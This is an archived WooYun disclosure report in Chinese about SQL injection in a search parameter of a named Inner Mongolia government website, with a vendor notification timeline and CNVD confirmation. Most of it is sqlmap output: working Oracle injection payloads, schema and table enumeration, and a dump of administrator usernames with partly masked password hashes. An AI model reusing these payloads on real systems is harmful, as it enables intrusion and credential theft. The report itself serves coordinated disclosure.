乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-04-11: 细节已通知厂商并且等待厂商处理中 2014-04-16: 厂商已经确认,细节仅向厂商公开 2014-04-26: 细节向核心白帽子及相关领域专家公开 2014-05-06: 细节向普通白帽子公开 2014-05-16: 细节向实习白帽子公开 2014-05-26: 细节向公众公开
主站存在注入漏洞,导致信息泄漏
http://www.nmjt.gov.cn/whcx/index.jspPOST:"x=72&y=19&txtquery=1"SQLI参数:txtquery
sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org数据做了点掩饰~~[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 11:33:45[11:33:45] [INFO] resuming back-end DBMS 'oracle' [11:33:45] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: txtquery Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: x=72&y=19&txtquery=1%' AND 1779=1779 AND '%'=' Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: x=72&y=19&txtquery=1%' AND 2987=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(116)||CHR(121)||CHR(101)||CHR(113)||(SELECT (CASE WHEN (2987=2987) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(101)||CHR(104)||CHR(113)||CHR(62))) FROM DUAL) AND '%'=' Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: x=72&y=19&txtquery=1%' AND 9111=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(119)||CHR(67)||CHR(101),5) AND '%'='---[11:33:46] [INFO] the back-end DBMS is Oracleweb application technology: JSPback-end DBMS: Oracle[11:33:46] [INFO] fetched data logged to text files under 'D:\sqlmap\output\www.nmjt.gov.cn'[*] shutting down at 11:33:46
SQLMAP演示:列所有数据库:
[11:35:37] [INFO] resuming back-end DBMS 'oracle' [11:35:37] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: txtquery Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: x=72&y=19&txtquery=1%' AND 1779=1779 AND '%'=' Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: x=72&y=19&txtquery=1%' AND 2987=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(116)||CHR(121)||CHR(101)||CHR(113)||(SELECT (CASE WHEN (2987=2987) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(101)||CHR(104)||CHR(113)||CHR(62))) FROM DUAL) AND '%'=' Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: x=72&y=19&txtquery=1%' AND 9111=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(119)||CHR(67)||CHR(101),5) AND '%'='---[11:35:37] [INFO] the back-end DBMS is Oracleweb application technology: JSPback-end DBMS: Oracle[11:35:37] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes[11:35:37] [INFO] fetching database (schema) names[11:35:37] [INFO] the SQL query used returns 25 entriesavailable databases [25]:[*] CTVXSYS[*] DBZCSNMP[*] EXXFSYS[*] FLOWWS_030000[*] FLOWWS_FILES[*] HZR[*] IVX[*] MDSYS[*] NMSGZCX[*] OWE[*] OLARPSYS[*] ORDTSYS[*] OUTSLN[*] PZM[*] SCOYTT[*] SYH[*] SYYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] TURBOCMS[*] WZK_TEST[*] WXKSYS[*] WMSYS[*] XXDB[11:35:38] [INFO] fetched data logged to text files under 'D:\sqlmap\output\www.nmjt.gov.cn'[*] shutting down at 11:35:38
列当前数据库表:
sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 11:36:37[11:36:37] [INFO] resuming back-end DBMS 'oracle' [11:36:37] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: txtquery Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: x=72&y=19&txtquery=1%' AND 1779=1779 AND '%'=' Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: x=72&y=19&txtquery=1%' AND 2987=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(116)||CHR(121)||CHR(101)||CHR(113)||(SELECT (CASE WHEN (2987=2987) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(101)||CHR(104)||CHR(113)||CHR(62))) FROM DUAL) AND '%'=' Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: x=72&y=19&txtquery=1%' AND 9111=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(119)||CHR(67)||CHR(101),5) AND '%'='---[11:36:37] [INFO] the back-end DBMS is Oracleweb application technology: JSPback-end DBMS: Oracle[11:36:37] [INFO] fetching tables for database: 'TURBOCMS'[11:36:37] [INFO] the SQL query used returns 159 entriesDatabase: TURBOCMS[159 tables]+--------------------+| ADD_DIAXOCHA || ADD_LEZADEREMAIL || ADD_USZER || ADD_WSSXF || ALLSOW || APPROSVAL || APPXROVALER || AUTHSORLIB || A_VIEEW || BADWRORDS || BOATRD || BOARVDDEFINE || BOARDYBLINK || CARORDEZRPASS || CARORDEBRS || CARORDESRSTATION || CDS_EXECXUTION || CDS_RULRE || CHANNELTSCHEDULE || CHANNEYLSCHEMA || CHANXELSCHEMA2 || CITYTZOCARSTATION || CMS_AXCL || CMS_AXTTACH || CMS_CHAZNNEL || CMS_COLUMZN || CMS_CONZTENT || CMS_FILEZATTRIBUTE || CMS_IMAZGE || CMS_PAZGES || CMS_UITZV || COLUMNISNSTANCE || CONTENTXACL || CONTENTAG || CONTENTLOG || CONTENTPROPERTY || CONTENTSOURCE || CONTENTSTATUS || CONTENTVERSION || CONTENTVIEW || CONTRIBUTE || CONTRIBUTECONFIG || CONTRIBUTELIB || CONTRIBUTETASK || DAM_IMG || DAM_IMG_TYPE || DAM_VIDEO || DAM_VIDEO_TYPE || DBDEP_EXSECUTION || DBDEP_LOG || DBDEP_SSCAN || DBDEP_TASK || DBDEP_TASSK_FIELD || DBSPIDER || DBSPIDEREXECUTION || DBSPIDERSFIELD || DBSPIDERRECORD || DBSPIDERSSCHEDULE || DELEGATE || DEP_EXESCUTION || DEP_LOG || DEP_RECORD || DEP_SCAN || DEP_TASK || DIRDELEGATE || DM_GLJSDJ || FILEVERSION || GROUPACL || GRWOUPS || HWF || HTMILBLSOCK || HTMULVERSION || IDMANAGER || IMAYGEUPLOAD || IMGTLIB || IMGRLIBTYPE || INEBOX || INTERWACTION || ISSUE || KEYWORD || KEYWORDLINK || KEYWORDTYPE || MACRO || MACROCLASS || MACROVERSION || MAGAZINE || MAGAZWINEPROPERTY || MANAGECWOMMENT || MYZJ_SUBSJECT || NEWSPXAPER || N_XBG || N_LYJQ || ORGUNIT || PAGE || PAGECOLUMN || PAGECOLUMNLINE || PAGECONTENT || PAGELINK || RECYLE || RELATIVEARTICLES || RELDEFINE || ROLES || SEARCHMETADATA || SHARE_ACL || SHARE_NODE || SHARE_NODEUSER || SHARE_NOZTIFY || SHARE_RECORDER || SHARE_RECORDER_REF || SIZTE || SOURCE || SPELXLDEP || SPESLLDICT || SPELXLPERSON || SPIDERCONTENT || SPIDERRECORD || SPIDERRULE || SPIDERSITE || SPIDER_LOG || SUBJECT || SUBJECTCOLUMN || SUBJECTS || SUBJECTSCOLUMN || SUBJECTSLINE || SUBJECTSTYPE || SUBJECTTYPE || SYSCOXXNFIG || SYSLOG || TEMPLATE_MACRO || TOLLSTANDARD || TXF_JG || UITV_NODE || UITV_PROGRAME || USERGSSROUP || USERMANAGER || USERROLE || USER_GROUP || USSER_GROUPS || USER_USERS || USEZZR_WEBAPPS || VISSSITACL || VISITUSER || WATEXRMARK || WESBAXPPS || WEBSSPIDER || WEBSPIDEREXECUTION || WEBSSPSIDERQUEUE || WEBSPSIDERRECORD || WEBSPISDSERSCHEDULE || WFSSTEP || WFSTEPINSTANCE || WORKFLOW || WSDCSCONTENT || WSDCITEM || XINGSZQH || XT_JSG || XT_JSGUU || XT_JSG_OLD || XXGKSSQB |+--------------------+[11:36:38] [INFO] fetched data logged to text files under 'D:\sqlmap\output\www.nmjt.gov.cn'[*] shutting down at 11:36:38
列管理员数据:
[11:38:04] [INFO] resuming back-end DBMS 'oracle' [11:38:04] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: txtquery Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: x=72&y=19&txtquery=1%' AND 1779=1779 AND '%'=' Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: x=72&y=19&txtquery=1%' AND 2987=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(116)||CHR(121)||CHR(101)||CHR(113)||(SELECT (CASE WHEN (2987=2987) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(101)||CHR(104)||CHR(113)||CHR(62))) FROM DUAL) AND '%'=' Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: x=72&y=19&txtquery=1%' AND 9111=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(119)||CHR(67)||CHR(101),5) AND '%'='---[11:38:04] [INFO] the back-end DBMS is Oracleweb application technology: JSPback-end DBMS: Oracle[11:38:04] [INFO] fetching columns 'PASSWORD, USERID, USERNAME' for table 'USER_USERS' in database 'TURBOCMS'[11:38:04] [INFO] the SQL query used returns 3 entries[11:38:04] [INFO] resumed: USERID[11:38:04] [INFO] resumed: NUMBER[11:38:04] [INFO] resumed: USERNAME[11:38:04] [INFO] resumed: VARCHAR2[11:38:04] [INFO] resumed: PASSWORD[11:38:04] [INFO] resumed: VARCHAR2[11:38:04] [INFO] fetching entries of column(s) 'PASSWORD, USERID, USERNAME' for table 'USER_USERS' in database 'TURBOCMS'[11:38:04] [INFO] resumed: *************************DC0E27A[11:38:04] [INFO] resumed: 1[11:38:04] [INFO] resumed: admin[11:38:04] [INFO] resumed: *************************09DF690[11:38:04] [INFO] resumed: 69[11:38:04] [INFO] resumed: myp[11:38:04] [INFO] resumed: *************************09DF690[11:38:04] [INFO] resumed: 71[11:38:04] [INFO] resumed: yf[11:38:04] [INFO] resumed: *************************09DF690[11:38:04] [INFO] resumed: 84[11:38:04] [INFO] resumed: lw[11:38:04] [INFO] resumed: *************************09DF690[11:38:04] [INFO] resumed: 91[11:38:04] [INFO] resumed: yy[11:38:04] [INFO] resumed: *************************09DF690[11:38:04] [INFO] resumed: 94[11:38:04] [INFO] resumed: fyf[11:38:04] [INFO] resumed: *************************09DF690[11:38:04] [INFO] resumed: 96[11:38:04] [INFO] resumed: zwq[11:38:04] [INFO] resumed: *************************A330112[11:38:04] [INFO] resumed: 103[11:38:04] [INFO] resumed: wry[11:38:04] [INFO] resumed: *************************09DF690[11:38:04] [INFO] resumed: 105[11:38:04] [INFO] resumed: sxf[11:38:04] [INFO] resumed: *************************09DF690[11:38:04] [INFO] resumed: 107[11:38:04] [INFO] resumed: zzw[11:38:04] [INFO] resumed: *************************09DF690[11:38:04] [INFO] resumed: 112[11:38:04] [INFO] resumed: zy[11:38:04] [INFO] resumed: *************************09DF690[11:38:04] [INFO] resumed: 113[11:38:04] [INFO] resumed: zj[11:38:04] [INFO] resumed: *************************09DF690[11:38:04] [INFO] resumed: 123[11:38:04] [INFO] resumed: wzj[11:38:04] [INFO] resumed: *************************09DF690[11:38:04] [INFO] resumed: 126[11:38:04] [INFO] resumed: yyq[11:38:04] [INFO] resumed: *************************09DF690[11:38:04] [INFO] resumed: 128[11:38:04] [INFO] resumed: lq[11:38:04] [INFO] resumed: *************************50E25DC[11:38:04] [INFO] resumed: 136[11:38:04] [INFO] resumed: adminli[11:38:04] [INFO] resumed: *************************AA7DFC7[11:38:04] [INFO] resumed: 137[11:38:04] [INFO] resumed: adminha[11:38:04] [INFO] resumed: *************************09DF690[11:38:04] [INFO] resumed: 138[11:38:04] [INFO] resumed: cwm[11:38:04] [INFO] resumed: *************************DB6DD39[11:38:04] [INFO] resumed: 139[11:38:04] [INFO] resumed: snrq[11:38:04] [INFO] resumed: *************************09DF690[11:38:04] [INFO] resumed: 140[11:38:04] [INFO] resumed: lz[11:38:04] [INFO] analyzing table dump for possible password hashes[11:38:04] [INFO] recognized possible password hashes in column 'PASSWORD'
登录:
------------------------------演示完成,未做其他操作---------------------------------------
SQLI老生常谈的了。
危害等级:高
漏洞Rank:13
确认时间:2014-04-16 09:34
CNVD确认并复现所述情况,已经转由CNCERT下发给内蒙古分中心处置。
暂无